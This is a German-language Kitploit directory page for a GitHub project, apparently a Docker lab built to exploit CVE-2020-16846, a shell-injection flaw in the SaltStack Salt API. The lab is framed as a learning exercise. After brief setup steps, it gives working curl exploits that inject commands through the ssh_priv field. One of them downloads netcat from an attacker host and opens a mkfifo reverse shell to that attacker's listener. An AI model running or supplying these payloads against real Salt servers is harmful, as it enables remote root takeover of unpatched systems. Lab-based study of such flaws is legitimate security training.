Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2020-16846-Saltstack-Salt-API — Docker-basierte Laborumgebung zur Ausnutzung von CVE-2020-16846, einer Shell-Injection-Sicherheitslücke in der SaltStack Salt API, mit Schritt-für-Schritt-Anleitungen zur Ausnutzung und Beispielen für Reverse-Shell-Payloads. | Kitploit
Tools/GitHubGitHub/zomy22/cve-2020-16846-saltstack-salt-api
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubzomy22/cve-2020-16846-saltstack-salt-api

CVE-2020-16846-Saltstack-Salt-API

Docker-basierte Laborumgebung zur Ausnutzung von CVE-2020-16846, einer Shell-Injection-Sicherheitslücke in der SaltStack Salt API, mit Schritt-für-Schritt-Anleitungen zur Ausnutzung und Beispielen für Reverse-Shell-Payloads.

Repository anzeigen
32vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2020-16846-Saltstack-Salt-API

Erläuterung der Schwachstelle: In SaltStack Salt bis Version 3002 wurde eine Sicherheitslücke entdeckt. Durch das Senden präparierter Webanfragen an die Salt-API mit aktiviertem SSH-Client kann eine Shell-Injection ausgelöst werden. Details zu dieser Schwachstelle finden Sie hier:

https://www.zerodayinitiative.com/blog/2020/11/24/detailing-saltstack-salt-command-injection-vulnerabilities

Zu Übungs- und Lernzwecken habe ich beschlossen, eine verwundbare Instanz zu erstellen und auszunutzen.

Verwundbare Version: https://github.com/saltstack/salt/releases/tag/v3002

Getestet auf Ubuntu 20.04.03

Anleitung

Verwenden Sie die Dockerfile, um eine verwundbare Instanz in Docker zu erstellen.

Führen Sie salt_setup.sh aus, wenn Sie eine verwundbare Instanz auf einer Ubuntu-VM erstellen möchten.

Image erstellen

docker build -t salt-image .

Container ausführen und Ports freigeben (nur 8080 wird tatsächlich benötigt, um es ausnutzen zu können)

docker run -p4506:4506 -p4505:4505 -p8000:8000 -it salt-image:latest

api

Ausnutzung

curl -i $salt_ip_addr:$salt_api_port/run -H "Content-type: application/json" -d '{"client":"ssh","tgt":"A","fun":"B","eauth":"C","ssh_priv":"|id>/tmp/test #"}'

reverse_shell

Reverse Shell

root@kitploit:~
root@kali:~# curl -i $salt_ip_addr:$salt_api_port/run -H "Content-type: application/json" -d '{"client":"ssh","tgt":"A","fun":"B","eauth":"C","ssh_priv":"| /usr/bin/wget http://$attacker_ip/nc -O /root/nc; chmod +x /root/nc; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|/root/nc $attacker_ip $listener_port >/tmp/f  #"}'

pwned

Tool herunterladen